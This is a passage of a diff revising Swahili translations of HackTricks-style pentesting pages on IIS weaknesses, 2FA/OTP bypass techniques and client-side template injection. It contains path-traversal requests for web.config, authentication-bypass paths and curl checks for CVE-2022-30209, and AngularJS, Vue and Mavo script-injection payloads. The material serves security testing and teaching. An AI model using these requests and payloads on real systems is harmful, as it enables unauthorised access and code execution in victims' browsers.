Pia, faili za **connectionstrings.config** na **global.asax** zinaweza kuwa na habari muhimu.\\
{% endhint %}
@ -97,23 +97,23 @@ Mfano wa kupata faili ya **web.config** unaonyeshwa hapa chini:
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
```
Hii ombi inaonyesha mipangilio na mategemeo mbalimbali, kama vile:
Hii ombi inaonyesha mipangilio mbalimbali na mahitaji, kama vile:
* **EntityFramework** toleo
* **AppSettings** kwa kurasa za wavuti, uthibitishaji wa mteja, na JavaScript
* Mipangilio ya **System.web** kwa uthibitishaji na wakati wa uendeshaji
* Mipangilio ya **System.web** kwa uthibitisho na wakati wa uendeshaji
* Mipangilio ya moduli za **System.webServer**
* Vifungo vya uundaji wa **Runtime** kwa maktaba nyingi kama **Microsoft.Owin**, **Newtonsoft.Json**, na **System.Web.Mvc**
* Uunganisho wa vifurushi vya uendeshaji kwa maktaba nyingi kama **Microsoft.Owin**, **Newtonsoft.Json**, na **System.Web.Mvc**
Mipangilio hii inaonyesha kwamba faili fulani, kama vile **/bin/WebGrease.dll**, ziko ndani ya folda ya maombi /bin.
### **Faili za Dhibiti ya Mzizi**
Faili zilizopatikana katika folda ya mzizi, kama vile **/global.asax** na **/connectionstrings.config** (ambayo ina nywila nyeti), ni muhimu kwa usanidi na uendeshaji wa maombi.
Faili zilizopatikana katika saraka ya mzizi, kama vile **/global.asax** na **/connectionstrings.config** (ambayo ina nywila nyeti), ni muhimu kwa usanidi na uendeshaji wa maombi.
### **Namespaces na Web.Config**
Maombi ya MVC pia hufafanua faili za ziada za **web.config** kwa majina ya kipekee ili kuepuka matangazo ya kurudia katika kila faili, kama ilivyoonyeshwa na ombi la kupakua **web.config** nyingine.
Maombi ya MVC pia hufafanua **faili za web.config** za ziada kwa majina ya kipekee ili kuepuka matangazo ya kurudia katika kila faili, kama ilivyoonyeshwa na ombi la kupakua **web.config** nyingine:
```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
@ -127,7 +127,7 @@ Host: example-mvc-application.minded
```
Hii inaashiria uwepo wa DLLs muhimu zingine, kama vile **System.Web.Mvc.dll** na **System.Web.Optimization.dll**, katika saraka ya /bin.
Katika hali ambapo DLL inaingiza nafasi ya jina inayoitwa **WebApplication1.Areas.Minded**, mshambuliaji anaweza kufikiria uwepo wa faili za web.config zingine katika njia zinazoweza kutabirika, kama vile **/jina-la-eneo/Views/**, zenye mazingira maalum na marejeo kwa DLLs zingine katika saraka ya /bin. Kwa mfano, ombi kwa **/Minded/Views/web.config** inaweza kufichua mazingira na nafasi za majina zinazoonyesha uwepo wa DLL nyingine, **WebApplication1.AdditionalFeatures.dll**.
Katika hali ambapo DLL inaingiza nafasi ya jina inayoitwa **WebApplication1.Areas.Minded**, mshambuliaji anaweza kufikiria uwepo wa faili zingine za web.config katika njia zinazoweza kutabirika, kama vile **/jina-la-eneo/Views/**, zenye mazingira maalum na marejeleo kwa DLLs zingine katika saraka ya /bin. Kwa mfano, ombi kwa **/Minded/Views/web.config** inaweza kufichua mazingira na nafasi za majina zinazoonyesha uwepo wa DLL nyingine, **WebApplication1.AdditionalFeatures.dll**.
### Faili za Kawaida
@ -219,10 +219,10 @@ Ili kupata ukurasa wa wavuti, unaweza kutazama **Cheti cha SSL** kilichotolewa n
## Mapungufu ya zamani ya IIS yanayostahili kutafutwa
### Microsoft IIS tilde character "\~" Mporomoko/Wasilisho wa Jina Fupi la Faili/Folderi
### Microsoft IIS tilde character "\~" Mporomoko/Wasilisho wa Jina Fupi la Faili/Daktari
Unaweza kujaribu **kuorodhesha folda na faili** ndani ya kila folda iliyopatikana (hata kama inahitaji Uthibitishaji wa Msingi) kwa kutumia **njia hii**.\
Kizuizi kikuu cha njia hii ikiwa server ina mapungufu ni kwamba **inaweza kupata hadi herufi 6 za kwanza za jina la kila faili/folderi na herufi 3 za kwanza za upanuzi** wa faili.
Kizuizi kikuu cha njia hii ikiwa server ina mapungufu ni kwamba **inaweza kupata hadi herufi 6 za kwanza za jina la kila faili/folder na herufi 3 za kwanza za upanuzi** wa faili.
Unaweza kutumia [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) kujaribu mapungufu huu:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
@ -236,15 +236,15 @@ Unaweza pia kutumia **metasploit**: `tumia scanner/http/iis_shortname_scanner`
**Puuza** uthibitishaji wa msingi (**IIS 7.5**) kwa kujaribu kupata: `/admin:$i30:$INDEX_ALLOCATION/admin.php` au `/admin::$INDEX_ALLOCATION/admin.php`
Unaweza kujaribu **kuchanganya** mapungufu huu na ule wa mwisho kupata **folda mpya** na **kupuuza** uthibitishaji.
Unaweza kujaribu **kuchanganya** mapungufu haya na la mwisho kupata **folda mpya** na **kupuuza** uthibitishaji.
## Ufuatiliaji wa ASP.NET Trace.AXD uliowezeshwa kwa kufuatilia makosa
## Ufuatiliaji wa ASP.NET Trace.AXD uliowezeshwa kwa kufuatilia
ASP.NET inajumuisha hali ya kufuatilia makosa na faili yake inaitwa `trace.axd`.
ASP.NET inajumuisha hali ya kufuatilia na faili yake inaitwa `trace.axd`.
Inaendelea kumbukumbu ya kina ya maombi yote yaliyofanywa kwa programu kwa kipindi fulani cha wakati.
Maelezo haya ni pamoja na IP za wateja wa mbali, vitambulisho vya kikao, vidakuzi vyote vya ombi na majibu, njia za kimwili, maelezo ya msimbo wa chanzo, na labda hata majina ya watumiaji na nywila.
Maelezo haya ni pamoja na IP za wateja wa mbali, vitambulisho vya kikao, vidakuzi vyote vya ombi na majibu, njia za kimwili, habari za msimbo wa chanzo, na labda hata majina ya watumiaji na nywila.
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
@ -254,17 +254,17 @@ Maelezo haya ni pamoja na IP za wateja wa mbali, vitambulisho vya kikao, vidakuz
ASPXAUTH hutumia habari ifuatayo:
* **`validationKey`** (string): ufunguo ulio na hex ili kutumika kwa uthibitisho wa saini.
* **`validationKey`** (string): ufunguo ulio na hex kwa ajili ya uthibitisho wa saini.
* **`decryptionMethod`** (string): (chaguo-msingi "AES").
* **`decryptionIV`** (string): vector ya kuanzisha iliyohex (chaguo-msingi ni vector ya sifuri).
* **`decryptionKey`** (string): ufunguo ulio na hex ili kutumika kwa kufungua.
* **`decryptionKey`** (string): ufunguo ulio na hex kwa ajili ya kufungua.
Hata hivyo, watu fulani watatumia **thamani za chaguo-msingi** za vigezo hivi na watatumia **kuki ya barua pepe ya mtumiaji**. Kwa hivyo, ikiwa unaweza kupata wavuti inayotumia **jukwaa sawa** linalotumia kuki ya ASPXAUTH na **kuunda mtumiaji na barua pepe ya mtumiaji unayetaka kujifanya** kwenye server inayoshambuliwa, unaweza kutumia **kuki kutoka kwa server ya pili kwenye ya kwanza** na kujifanya kuwa mtumiaji.\
Shambulio hili lilifanikiwa katika hii [**makala**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
## Kupuuza Uthibitishaji wa IIS kwa kutumia nywila zilizohifadhiwa (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[Ripoti kamili hapa](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Kosa katika nambari **haikuchunguza ipasavyo nywila iliyotolewa na mtumiaji**, kwa hivyo mshambuliaji ambaye **hashi ya nywila inagonga funguo** ambalo tayari lipo kwenye **cache** ataweza kuingia kama mtumiaji huyo.
[Ripoti kamili hapa](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Kosa katika msimbo **haukuchunguza ipasavyo nywila iliyotolewa na mtumiaji**, hivyo mshambuliaji ambaye **hashi ya nywila inagonga funguo** ambalo tayari lipo kwenye **cache** ataweza kuingia kama mtumiaji huyo.
```python
# script for sanity check
> type test.py
@ -284,15 +284,15 @@ HTTP/1.1 401 Unauthorized
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malwares za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
Unaweza kutembelea tovuti yao na kujaribu injini yao kwa **bure** kwa:
{% embed url="https://whiteintel.io" %}

View file

@ -1,8 +1,8 @@
# Kupita kwa 2FA/OTP
# Kupitisha 2FA/OTP
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalam wa juu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -14,13 +14,13 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **programu hasidi za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -28,23 +28,23 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
---
## **Mbinu za Kupita kwa Uthibitishaji wa Hatua Mbili Ulioboreshwa**
## **Mbinu za Kupitisha Uthibitishaji wa Hatua Mbili Ulioboreshwa**
### **Upatikanaji wa Moja kwa Moja wa Njia ya Mwisho**
### **Upatikanaji wa Moja kwa Moja wa Nukta ya Mwisho**
Kupita kwa 2FA, upate upatikanaji wa njia inayofuata moja kwa moja, kujua njia ni muhimu. Ikiwa haujafanikiwa, badilisha **kichwa cha Referrer** kufanana na urambazaji kutoka kwenye ukurasa wa uthibitishaji wa 2FA.
Ili kupita 2FA, upate upatikanaji wa moja kwa moja wa nukta inayofuata, kujua njia ni muhimu. Ikiwa haujafanikiwa, badilisha **kichwa cha Referrer** kufanana na urambazaji kutoka ukurasa wa uthibitishaji wa 2FA.
### **Matumizi ya Tena ya Token**
### **Matumizi ya Upya wa Alama**
Kutumia tena token zilizotumiwa hapo awali kwa uthibitishaji ndani ya akaunti inaweza kuwa na ufanisi.
Kutumia tena alama zilizotumiwa hapo awali kwa uthibitishaji ndani ya akaunti inaweza kuwa na ufanisi.
### **Matumizi ya Token Zisizotumiwa**
### **Matumizi ya Alama Zisizotumiwa**
Kuchimba token kutoka kwenye akaunti yako mwenyewe ili kupita 2FA kwenye akaunti nyingine kunaweza kujaribiwa.
Kuchimba alama kutoka kwenye akaunti yako mwenyewe ili kupita 2FA kwenye akaunti nyingine kunaweza kujaribiwa.
### **Ufunuo wa Token**
### **Ufunuo wa Alama**
Chunguza ikiwa token inafunuliwa katika jibu kutoka kwenye programu ya wavuti.
Chunguza ikiwa alama inafunuliwa katika majibu kutoka kwenye programu ya wavuti.
### **Udanganyifu wa Kiungo cha Uthibitishaji**
@ -52,41 +52,41 @@ Kutumia **kiungo cha uthibitishaji wa barua pepe uliotumwa wakati wa uundaji wa
### **Udhibiti wa Kikao**
Kuanzisha vikao kwa akaunti ya mtumiaji na akaunti ya mwathiriwa, na kukamilisha 2FA kwa akaunti ya mtumiaji bila kuendelea, inaruhusu jaribio la kupata hatua inayofuata katika mchakato wa akaunti ya mwathiriwa, ikidanganya mipaka ya usimamizi wa kikao cha nyuma.
Kuanzisha vikao kwa akaunti ya mtumiaji na ya muhanga, na kukamilisha 2FA kwa akaunti ya mtumiaji bila kuendelea, inaruhusu jaribio la kupata hatua inayofuata katika mchakato wa akaunti ya muhanga, ikidanganya mipaka ya usimamizi wa kikao cha nyuma.
### **Mbinu ya Kurejesha Nywila**
Kuchunguza kazi ya kurejesha nywila, ambayo inaingiza mtumiaji kwenye programu baada ya kurejesha, kwa uwezo wake wa kuruhusu urejeshaji wa mara nyingi kwa kutumia kiungo kimoja ni muhimu. Kuingia kwa kutumia maelezo ya kuingia upya kunaweza kupita 2FA.
Kuchunguza kazi ya kurejesha nywila, ambayo inamuingiza mtumiaji kwenye programu baada ya kurejesha, kwa uwezo wake wa kuruhusu urejeshaji wa nywila nyingi kwa kutumia kiungo kimoja ni muhimu. Kuingia kwa kutumia sifa mpya za urejeshaji kunaweza kupita 2FA.
### **Udanganyifu wa Jukwaa la OAuth**
Kudukua akaunti ya mtumiaji kwenye jukwaa la **OAuth** lililoidhinishwa (k.m., Google, Facebook) inaweza kutoa njia ya kupita 2FA.
Kudukua akaunti ya mtumiaji kwenye jukwaa la **OAuth** lililothibitishwa (k.m., Google, Facebook) kunaweza kutoa njia ya kupita 2FA.
### **Mashambulio ya Brute Force**
### **Mashambulizi ya Brute Force**
#### **Kutokuwepo kwa Kikomo cha Kasi**
Ukosefu wa kikomo kwenye idadi ya majaribio ya nambari inaweza kuruhusu mashambulio ya brute force, ingawa inapaswa kuzingatiwa kikomo cha kimya cha kasi.
Ukosefu wa kikomo kwenye idadi ya majaribio ya nambari kunaruhusu mashambulizi ya brute force, ingawa kikomo cha kimya kinapaswa kuzingatiwa.
#### **Mashambulio ya Brute Force ya Polepole**
#### **Brute Force Polepole**
Mashambulio ya brute force ya polepole yanawezekana ambapo kuna vikwazo vya kasi ya mtiririko bila kikomo kuu.
Mashambulizi ya brute force polepole yanawezekana ambapo kuna vikwazo vya kasi ya mwendokasi bila kikomo kuu.
#### **Kurejesha Upya Kikomo cha Kutuma Nambari**
#### **Kurejesha Upya Nambari ya Kanuni**
Kutuma tena nambari kunairejesha kikomo cha kasi, kurahisisha majaribio ya brute force yanayoendelea.
Kurejesha tena nambari kunarejesha kikomo cha kasi, kurahisisha majaribio ya brute force kuendelea.
#### **Kuzunguka Kikomo cha Kasi ya Mteja**
Hati inaelezea mbinu za kuzunguka kikomo cha kasi ya mteja.
Hati inaelezea mbinu za kuzunguka vikwazo vya kasi ya mteja.
#### **Hatua za Ndani Zinakosa Kikomo cha Kasi**
#### **Hatua za Ndani Hazina Kikomo cha Kasi**
Vikwazo vya kasi vinaweza kulinda majaribio ya kuingia lakini sio hatua za ndani za akaunti.
Vikwazo vya kasi vinaweza kulinda majaribio ya kuingia lakini sio hatua za akaunti za ndani.
#### **Gharama za Kutuma Upya Nambari za SMS**
#### **Gharama za Kurejesha Nambari za SMS**
Kutuma upya nambari kupitia SMS kunagharimu kampuni, ingawa haisababishi kupita 2FA.
Kurejesha nambari kupitia SMS kunagharimu kampuni, ingawa haisababishi kupita 2FA.
#### **Uzalishaji wa OTP Usio na Mwisho**
@ -98,43 +98,43 @@ Kudukua hali za mashindano kwa kupita 2FA inaweza kupatikana kwenye hati maalum.
### **Makosa ya CSRF/Clickjacking**
Kuchunguza makosa ya CSRF au Clickjacking kwa kulemaza 2FA ni mkakati unaoweza kutumika.
Kuchunguza makosa ya CSRF au Clickjacking kwa kulegeza 2FA ni mkakati unaoweza kutumika.
### **Udanganyifu wa Kipengele cha "Kumbuka Mimi"**
### **Udanganyifu wa Kipengele cha "Nikumbuke"**
#### **Thamani za Vidakuzi Zinazoweza Kupredict**
#### **Alama za Vidakuzi Zinazoweza Kupredict**
Kudhani thamani ya kuki ya "kumbuka mimi" kunaweza kupita vizuizi.
Kudhanisha thamani ya kuki ya "nikumbuke" kunaweza kupita vizuizi.
#### **Uigaji wa Anwani ya IP**
Kujifanya kuwa anwani ya IP ya mwathiriwa kupitia kichwa cha **X-Forwarded-For** kunaweza kupita vizuizi.
Kujifanya kuwa anwani ya IP ya muhanga kupitia kichwa cha **X-Forwarded-For** kunaweza kupita vizuizi.
### **Matumizi ya Toleo za Zamani**
### **Matumizi ya Toleo la Zamani**
#### **Subdomains**
Kujaribu subdomains kunaweza kutumia toleo za zamani zisizo na msaada wa 2FA au kuwa na utekelezaji wa 2FA unaoweza kudukuliwa.
Kujaribu subdomains kunaweza kutumia toleo la zamani lisilokuwa na msaada wa 2FA au kuwa na utekelezaji wa 2FA unaoweza kudukuliwa.
#### **Njia za API**
Toleo za zamani za API, zinazoonyeshwa na njia za saraka za /v\*/, zinaweza kuwa na mapungufu ya kupita 2FA.
### **Kushughulikia Vikao Vya Awali**
### **Kushughulikia Vikao vya Awali**
Kukomesha vikao vilivyopo baada ya kuamsha 2FA kunalinda akaunti dhidi ya upatikanaji usioidhinishwa kutoka kwa vikao vilivyoathiriwa.
Kukomesha vikao vilivyopo baada ya 2FA kuwekwa kazi kunalinda akaunti dhidi ya upatikanaji usioidhinishwa kutoka kwa vikao vilivyoathiriwa.
### **Makosa ya Kudhibiti Upatikanaji na Nambari za Kurejesha**
Uzalishaji wa haraka na upatikanaji usioidhinishwa wa nambari za kurejesha mara moja baada ya kuamsha 2FA, hasa na misongamano ya CORS/XSS, inaleta hatari.
Uzalishaji wa haraka na upatikanaji usioidhinishwa wa nambari za kurejesha baada ya 2FA kuwekwa kazi, hasa na makosa ya CORS/XSS, inaleta hatari.
### **Ufunuo wa Habari kwenye Ukurasa wa 2FA**
Ufunuo wa habari nyeti (k.m., nambari ya simu) kwenye ukurasa wa uthibitishaji wa 2FA ni wasiwasi.
### **Kulemaza Ufutaji wa Nywila Unapozimisha 2FA**
### **Kulemaza Urejeshaji wa Nywila Unapozima 2FA**
Mchakato unaodhihirisha njia ya kupita unajumuisha uundaji wa akaunti, kuamsha 2FA, kufutaji wa nywila, na kuingia baadaye bila mahitaji ya 2FA.
Mchakato unaodhihirisha njia ya kupita unajumuisha uundaji wa akaunti, kuweka 2FA kazi, urejeshaji wa nywila, na kuingia baadaye bila mahitaji ya 2FA.
### **Maombi ya Kudanganya**
@ -144,3 +144,16 @@ Kutumia maombi ya kudanganya kuficha majaribio ya brute force au kudanganya mifu
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **programu hasidi za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}

View file

@ -4,7 +4,7 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -12,15 +12,15 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kuangalia tovuti yao na kujaribu injini yao **bure** kwa:
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
@ -28,15 +28,15 @@ Unaweza kuangalia tovuti yao na kujaribu injini yao **bure** kwa:
# Muhtasari
Ni kama [**Uvujaji wa Kigezo cha Upande wa Seva**](ssti-server-side-template-injection/) lakini kwenye **mteja**. **SSTI** inaweza kukuruhusu kutekeleza msimbo kwenye seva ya mbali, **CSTI** inaweza kukuruhusu kutekeleza msimbo wa JavaScript wa aina yoyote kwenye kivinjari cha mwathiriwa.
Ni kama [**Uvujaji wa Kigezo Upande wa Seva**](ssti-server-side-template-injection/) lakini kwenye **mteja**. **SSTI** inaweza kukuruhusu kutekeleza msimbo kwenye seva ya mbali, **CSTI** inaweza kukuruhusu kutekeleza msimbo wa JavaScript wa aina yoyote kwenye kivinjari cha mwathiriwa.
**Kutafuta** udhaifu huu ni sawa sana kama katika kesi ya **SSTI**, mkalimani anatarajia **kigezo** na kukiendesha. Kwa mfano, na mzigo kama `{{ 7-7 }}`, ikiwa programu ni **dhaifu** utaona `0`, na ikiwa sio, utaona asili: `{{ 7-7 }}`
**Kutafuta** hitilafu hii ni sawa sana kama katika kesi ya **SSTI**, mkalimani anatarajia **kigezo** na kukiendesha. Kwa mfano, na mzigo kama `{{ 7-7 }}`, ikiwa programu ni **dhaifu** utaona `0`, na ikiwa sio, utaona asili: `{{ 7-7 }}`
# AngularJS
AngularJS ni mfumo maarufu wa JavaScript ambao hufanya kazi na HTML kupitia sifa inayoitwa maelekezo, moja muhimu ikiwa ni **`ng-app`**. Mwongozo huu huruhusu AngularJS kusindika yaliyomo ya HTML, kuruhusu utekelezaji wa maelezo ya JavaScript ndani ya mabano mara mbili.
AngularJS ni mfumo maarufu wa JavaScript ambao hufanya kazi na HTML kupitia sifa inayoitwa miongozo, moja muhimu ikiwa ni **`ng-app`**. Miongozo hii inaruhusu AngularJS kusindika yaliyomo ya HTML, ikiruhusu utekelezaji wa mazungumzo ya JavaScript ndani ya mabano mara mbili.
Katika hali ambapo mwingiliano wa mtumiaji unawekwa kwa dinamiki ndani ya mwili wa HTML ulio na lebo ya `ng-app`, inawezekana kutekeleza msimbo wa JavaScript wa aina yoyote. Hii inaweza kufanikiwa kwa kutumia muundo wa AngularJS ndani ya mwingiliano. Hapa chini ni mifano inayoonyesha jinsi msimbo wa JavaScript unaweza kutekelezwa:
Katika hali ambapo mwingiliano wa mtumiaji unawekwa kwa dinamiki ndani ya mwili wa HTML ulio na lebo ya `ng-app`, inawezekana kutekeleza msimbo wa JavaScript wa aina yoyote. Hii inaweza kufanikiwa kwa kutumia muundo wa AngularJS ndani ya mwingiliano. Hapa chini kuna mifano inayoonyesha jinsi msimbo wa JavaScript unaweza kutekelezwa:
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
@ -56,14 +56,14 @@ Unaweza kupata mfano wa msingi sana wa udhaifu katika **AngularJS** katika [http
Unaweza kupata utekelezaji wa **Vue ulio na udhaifu** katika [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Mzigo unaoendelea: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
Na **msimbo wa chanzo** wa mfano ulio na udhaifu hapa: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
Na **msimbo wa chanzo** wa mfano ulio na udhaifu unapatikana hapa: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
```markup
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```
Unaweza kupata chapisho nzuri sana kuhusu CSTI katika VUE kwenye [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
## **V3**
## **V3**
Machapisho mazuri sana kuhusu CSTI katika VUE yanaweza kupatikana katika [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)
```
{{_openBlock.constructor('alert(1)')()}}
```
@ -79,7 +79,7 @@ Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
# Mavo
Mzigo:
Payload:
```
[7*7]
[(1,alert)(1)]
@ -93,19 +93,19 @@ javascript:alert(1)%252f%252f..%252fcss-images
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
```
**Paylodi zaidi katika** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
**Payloads zaidi katika** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
# **Orodha ya Uchunguzi wa Nguvu**
# **Orodha ya Uchunguzi wa Brute-Force**
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za kuiba**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -117,10 +117,10 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
